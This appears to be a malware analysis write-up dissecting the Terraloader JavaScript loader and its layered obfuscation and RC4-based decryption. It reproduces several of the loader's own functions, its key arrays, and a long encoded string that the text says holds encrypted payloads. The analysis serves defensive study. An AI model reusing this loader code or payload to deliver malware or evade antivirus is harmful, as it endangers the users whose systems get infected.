<h6>This analysis presents a javascript loader (Terraloader) using many arrays, calculations and variables in memory for make harder the analysis and lowering the detection rate on antivirus. This loader have two stagers.</h6>
<h6> The first block of the payload is the globals values used for decode the first layer, this give the tab of values as key, the offset, the base of characters and the rest for initialized the variables used for the second stage.</h6>
<h6>The next block is composed of two functions, the first use a switch case condition to select the character corresponding to its ASCII value, one interesting thing to note is the fact that the default case isn't set, it is automatically created by an IDE , which is more the sign of a generation by a tool.</h6>
```javascript
function get_ascii_value(arg)
{
var x = "";
switch (arg) {
case 32:
x = " ";
break;
case 33:
x = "!";
break;
case 34:
x = '"';
break;
case 35:
x = "#";
break;
case 36:
x = "$";
break;
case 37:
x = "%";
break;
case 38:
x = "&";
break;
case 39:
x = "'";
break;
case 40:
x = "(";
break;
case 41:
x = ")";
break;
case 42:
x = "*";
break;
case 43:
x = "+";
break;
case 44:
x = ",";
break;
case 45:
x = "-";
break;
case 46:
x = ".";
break;
case 47:
x = "/";
break;
case 48:
x = "0";
break;
case 49:
x = "1";
break;
case 50:
x = "2";
break;
case 51:
x = "3";
break;
case 52:
x = "4";
break;
case 53:
x = "5";
break;
case 54:
x = "6";
break;
case 55:
x = "7";
break;
case 56:
x = "8";
break;
case 57:
x = "9";
break;
case 58:
x = ":";
break;
case 59:
x = ";";
break;
case 60:
x = "<";
break;
case 61:
x = "=";
break;
case 62:
x = ">";
break;
case 63:
x = "?";
break;
case 64:
x = "@";
break;
case 65:
x = "A";
break;
case 66:
x = "B";
break;
case 67:
x = "C";
break;
case 68:
x = "D";
break;
case 69:
x = "E";
break;
case 70:
x = "F";
break;
case 71:
x = "G";
break;
case 72:
x = "H";
break;
case 73:
x = "I";
break;
case 74:
x = "J";
break;
case 75:
x = "K";
break;
case 76:
x = "L";
break;
case 77:
x = "M";
break;
case 78:
x = "N";
break;
case 79:
x = "O";
break;
case 80:
x = "P";
break;
case 81:
x = "Q";
break;
case 82:
x = "R";
break;
case 83:
x = "S";
break;
case 84:
x = "T";
break;
case 85:
x = "U";
break;
case 86:
x = "V";
break;
case 87:
x = "W";
break;
case 88:
x = "X";
break;
case 89:
x = "Y";
break;
case 90:
x = "Z";
break;
case 91:
x = "[";
break;
case 92:
x = "\\";
break;
case 93:
x = "]";
break;
case 94:
x = "^";
break;
case 95:
x = "_";
break;
case 96:
x = "`";
break;
case 97:
x = "a";
break;
case 98:
x = "b";
break;
case 99:
x = "c";
break;
case 100:
x = "d";
break;
case 101:
x = "e";
break;
case 102:
x = "f";
break;
case 103:
x = "g";
break;
case 104:
x = "h";
break;
case 105:
x = "i";
break;
case 106:
x = "j";
break;
case 107:
x = "k";
break;
case 108:
x = "l";
break;
case 109:
x = "m";
break;
case 110:
x = "n";
break;
case 111:
x = "o";
break;
case 112:
x = "p";
break;
case 113:
x = "q";
break;
case 114:
x = "r";
break;
case 115:
x = "s";
break;
case 116:
x = "t";
break;
case 117:
x = "u";
break;
case 118:
x = "v";
break;
case 119:
x = "w";
break;
case 120:
x = "x";
break;
case 121:
x = "y";
break;
case 122:
x = "z";
break;
case 123:
x = "{";
break;
case 124:
x = "|";
break;
case 125:
x = "}";
break;
case 126:
x = "~";
break;
}
return x;
}
```
<h6>The second function reconstructs by a series of loops while for build the base of characters used by loader</h6>
<h6>The third block is composed of five functions, the first two give the length of an object and the second to push an element in succession in the chosen array. The third allows to create an ability to search for a element in an array and get the index. </h6>
```javascript
function get_length(arg) {return arg.length;}
function push_element(tab, index) {return tab.push(index);}
function find_index(tab, search_element)
{
var index = 0;
do {
if (tab[index] === search_element) {return index;}
index = index + 1;
} while (index <get_length(tab));
}
```
<h6>The penultimate function give a capacity to compare two array for verity if the sequence of elements in a array is the same, this will be used later in the decryption of payloads. The last allows you to join the elements of an array to a string.</h6>
```javascript
function compare_arrays(tab, tab2)
{
var lim = get_length(tab);
var index = 0;
if (lim !== get_length(tab2)) {return false;}
do {
if (tab[index] !== tab2[index]) {return false;}
index = index + 1;
} while (index <lim);
return true;
}
function string_join(arg)
{
var tab = [];
var result = "";
var i = 0;
do {
push_element(tab, get_ascii_value(arg[i]));
i = i + 1;
} while (i <get_length(arg));
result = tab.join("");
return result;
}
```
<h6>The last block of four functions before seeing the main process of the script. The first function is an RC4 decryption for the fisrt decryption process. The second function the ability to decode byte by byte for the second decryption time. The third function is incremented on each return of main algorithm for get the key for the RC4 description, by this fact, this make a fixed value of the loops needed for the main algorithm. The last function launch the process for decrypt all the payloads in the script (exe + doc files).</h6>
<h6>Now, the main algorithm for the main function. Firstly, this used use a do-while loop to generate a sequence of elements if this trigger the same sequence that the reference, this break the loop in changing the value.</h6>
var seq = ["56","48","65","69","66","52","52","70","67","48","52","49","67","65","49","51","56","68","67","50","65","57","49","68","52","65","70","50","67","66"];
var base_rc4_array = ["215","222","25","139","201","0","105","245","65","151","59","255","225","38","56","210","150","155","102","217","254","187","160","241","186","19","19","145","227","137"];
var iden_correct = 0;
var inc = "";
var lim = 0;
var tmp_array = [];
var tab=["98","72","102","109","106","112","83","117","101","117","65","79","115","68","88","116","104","108"];
var blawp868 = 'q=bb.~cN[mUHO^M;T<B$Yr@5Xjzyu_6OcR%#u^#z(Wj|,l1OQ?`Y`3&:yP6jr`pq&j@oTj!%DX)"ZwG8uU!xHk$Dl="P8>gir$1zw9x$P!SgaC%;HP:{jG/im!gU&7I_X(IklQ6[dG:PI`<>ZU`iAc][&^z|Q3GIr&m_vK&#QGds:INk+7`NiTh1c*TimXeNl>z$f=K27q&v"evZ81mV7h+Ds+@6n4CO>c^?FGZ`+Xs&ilJY0ma!F}(/nRF5/XCCN3~jd:%t*te5uDgh73d^1FtvhwW!H`N%B&r?or8.u!An#v7^5BfjKW^}K]yLh(<9MI>9(AUb^f"Go8]l9Svylk=84;=X/jrf_cFHX3H87ks:=4.#Qx)7"c*A}pF.DgkQ1.<uwtHp/fHs$cFpF,yIqjo{,yERKl&lG{X6Vv<l}HSE0FxpmiQCF_75a:[T:/66OH|832~;D?:w5&7.3o:lYSd&X7YrI:R?kSfVhVU{=9D&5c&Q>?:Ei>erfni}J?>[)Q12+90Ct%&u8KG!|K~I4jOoHq~Cc_$?dI9ZN`EVe/r{W7nZ+{Zn5TZ"PA)l8RqSbSZDPDgh_=?M7:/8q[b6q]1]oo=.9T>38D&8&dL"ljtw/2UmHaDzWTa@Mb>Ln<]>[+<r<jaqEhz`|U>c(B9>9MttCS$DF:84O%E:d*MX:[{>B=8;`?5]9?0l)Z_.N=4L>B3UvT/lus:IHrmtn{q+q23FxTyl/NPB4f)Y^njSKZ!]xy_tNPq=Uq+[BNdL=(7z}r%}$>(8?_gKBP16yH9I{JU1t`Y7&&#d^3NC"+KuZ%FFI&jE+rX"fy"h@>8XQd@siq$K@+eTbFVQ5+Y33P)H,7dx;&@taQhdCObU7NxRAb{Y2kI+UL9f5X+Dxb&?DR|?khKIV?X[QFerFIeL[R~{D_WkQ[/iU=,?|YMg}tq#:Q$2`~J)HvEPJDalFC;^eQBl@x3+d|::s~SqlJ,u0UG.LiPHm/+`_%&gNK=".:2PTz<{6pdCamXVxavWxgz5x;[2>O2eI1_lEysb&._0.s+Bp4f&@Z"I:G`V~e5yGVvJc5HEVMU<m>(`wRfhv(q}nFp_|#s!"Jj0;G]u/(kjE|pDbu@bHq:r:I4.n5w@Ri#whG0t5+Zt)uGZb9aYqu7O|W5=;IL^7Nlm3K8>]7i*NBK7T"_%iJLKQkz^O6CL.~mG:la+&*dd^DW^AP0IZjd]&&KMKhXs/|y:2jo;duQ>zbNdo#|hn2:0v)SK!zP9ZW_#8Gl3;bZ>SnnpM2"w_CoTGG^@5d:o4mLK#c(xs)9V)jg;xoks?$z0s~e2!D5[6i^Sq.f(hlh3B/A[O`6r]H{7b@Shcy#+uG<QmV8FU/8Ji.9!B|9&9x"T^v?kNDI.Yk@nmR|/+]>T0s;M<)FOdw4.o`?a[qM}`KU[]4"SSBn~nZIdF<z6Vnd^aLn:~eV6yhOR3$q>S/@_W71{qzi%E=FM2sJb[oG.8fgz19nwwKHJSWd@,R@sfn1|?dyzcLk34r!m6c,LW^ZYKf/!,uJ(e3^09)"dgou=Uim<>M)Yzu?e+m:g!za`UIFu>j@z&TRB2KJqL!w?(tk==yUir5<kin>"0dA7Wc=^3#9L;0FZ$_J0N@9z%QT)[t,8H?P~%[R}Z=}rYO)X3nI?D#W[1$]WSUQBro@*q?EQ_{vVEKbijf>|M+?%>~wgHX*?bU<FY<{bMW?&zsVSbiN([=wu]x&NCw`hcspm*W51M76I7H"|6/qG&]$v%&o*6z7KFdIkC.BI>v%8~tU/ppM+|C~`n<l$G}]e!a..mGr*FQLXs<PXg(k_~kT!Fb6NelklQQ7>(U!U3H3d7mUT<fOqi@aDz3I+4RZtsWMw;RiKgdFSpcSoA!^3!g<t)Kg(W}5Pt2}F3_C&1{tJ;$vG%Btc.9A}y`wJXAI%(kOw7tQ$@<,4AM.cjRISM|a7jewR`m"d0q],6gA(`X6<v_]EE.jk=O4h?e8^?^"/^]5"kf:]Y!YZ|0sgNZXiJRhfQ3bxHpf2Y=&>=7^_KX!tjE^?BsgQF]2Qx9|u[ManzpM2$uuLM/pV,_6C*MPwd6FrUJM$$xEyrp3$`NLM,.2D1i!;l}<yQILB"*C3n)9T,i=O*a5Gc|8>jfl({3HPnb3I84iD8~IrJ&`zyKom&Bb<%,0%i#/VV`^gK%YLjz]@HcUB)G#1wta6_qTuvDPtS8<9!MK3#tJrjcxxEAb#6BFpxO+x1L*9;k{6J(JoLzHNZ[,&|1^8@l8GPJGnub0_Gut#EgxuG(O)pC7n4t>@?Jk8q=eLRj.lJkL.*S5pZm/b?9p;q{LNL_7^~khc0VY}Y,~SMrHP602%hT|@b$^D|hh3)u+4B^JEs%RFg;NWJVph7]ON~KL)Veu_GC<`xkFbH?9bu/Y?s/Rhdc$5|jC1{_9y<W[s_>@LRL[Z**6uf/4AQfTGWcdOwRUz,_hjHbi@hC{_{8@Z=D4pp|UR4@ib>L5fkm[)"kMz.qbXjRQOVE&Gf`]U.Wk>3IT+<>)m/Rw;6GoYK7rXV|a^y+ftjnvn=Q!q*7Cl886HSnjpZ`OzRayeH&VIF)uyW(dMbR4KWxKp"4$lI}91{e4=H.2$=p1UBpV0<wPXv:=)mzQ`$]>qK@$Fjyv8.y0>cbl:Hc{ayQ+M!Skk%f9sHAe/$1s4=9#N_~Kw0quNvH`[UB{]e|97O:$9h/A?;zXFE7Tf+[WJZBRXB,m]F|DUPRp,Yvo,VT_ow8S%ZV:|q+Gg1Kq&Tu+e;,Ls)*(EH=y9V{WN{drs3bfI^^Se/Xb=qT<VCb`I7t)3I[LQ_g@d6K^#_wNm<O/M=~AS&p6GI5=4:x&{fK./G+om|&1[7P/v5W?Ee~IyaRlcgOY[c[d7e3=|K5}dMCaCg`y>F}3y?^e1Cq)*ROylJ<BDKjtK.IKQP,BvyjeP$=N%&7tblRA*3q/(mr^LV)B:]6r$]Q.+wXeGmA8IDaJO$}0j|<|*}6>VI~`F%B39wSMh]8idYkQDJ(@.(T/!"o/L{OwE~_bC*Z"h.,E(:6yM}hn|@E=k1M"e[|y*#p25Bc#UOj~WhPB:^&DuJFc?1nBc,X]O_iOl[Yc}!4[#&Gn.XSP5QpGpUvJ[>;Ye#D%nK#%%DqU~qTubztqJAMC=E"Nux,zvGed}F|WMl7dS.[vS18e!g;8~ZWI8A?6e_X:Moc@G@~S@Ks=Ui{~O+meM{kn_8:e8HZLIW6)<Q}](,EKl!H1N^_:<"|#y_9Xa<8U1pi;.Sr.G15/x[9xjXDHnpiJXL^C^W/_Q40}q42lBFpN]4Y]WP&AxgE<5?C<b|JSijmwL01yET.YX1k<S"p9,/CdRDoM;>{a3J^;1$*ItMkidms15kW7ENZEDlcTH,;h^9>j{VCQwDRb;v_v/3:,a;E!=iP3QF|pt}E]#5/s<5|]y)W<N|,_j2B84hhZ&0BWPDbyD[+;:GEX.*~whE<Ojwf.s#uG+9&L2;f/$H)8r+.1O:BRab@wOdhdGAQuP+9yJz#rz)g|G$f*96fEq$#7jye)%e|AnKibSFh>EC=R)|>=nURCnT+0:"f6,<kWLV:>KvR"MH%mJa2:+:khs6H;x_dP.mI%@G:otAi_~CX:otyXM)adAiF?T`_!/Zyo4=U8*UeQ^Y&5nMnG7,8a/imXBBMSqe5uJ~bY#cQ=sDD[i"C$g6cgz!{j0.JEk%f#8CqvWXi{N:.mrS~:,xa6wV6*~:,"ZkEnDGyNd]FB$r7}0|[VQw*9U56/ur#BhQEjZ)z.v70:h|w#&l3RAy`cMe!AtUZJ$4I^[d|9QkL31S>vQj9u9=VzdNLzdG4P!NkARtg1|`yROgm[R.?@sq.y#)u$J^q,fvSY;A1O_ZPS[z!][3kIvG@QD!*IV3ocvcY*Pi_SjeBeuYctjZ:2wI6U;*DFTH+4:j_!z!@Z#VfIruW(+I0~`h&U`8lc06O=(,si8o]pnc8C`J!b&?oS_>_37Ty&#MX+oQlzemlX?H%p^h`K?,r8h}KW^K;Gl~*Z$8C2$:aSiYERHjuk@S`:&Y6xySSXFQ[VzF:!j;iBT:esfDH@v<i]qR|pP7{OO:NbKX|M$t]V.aOQAX{HRD[8IK
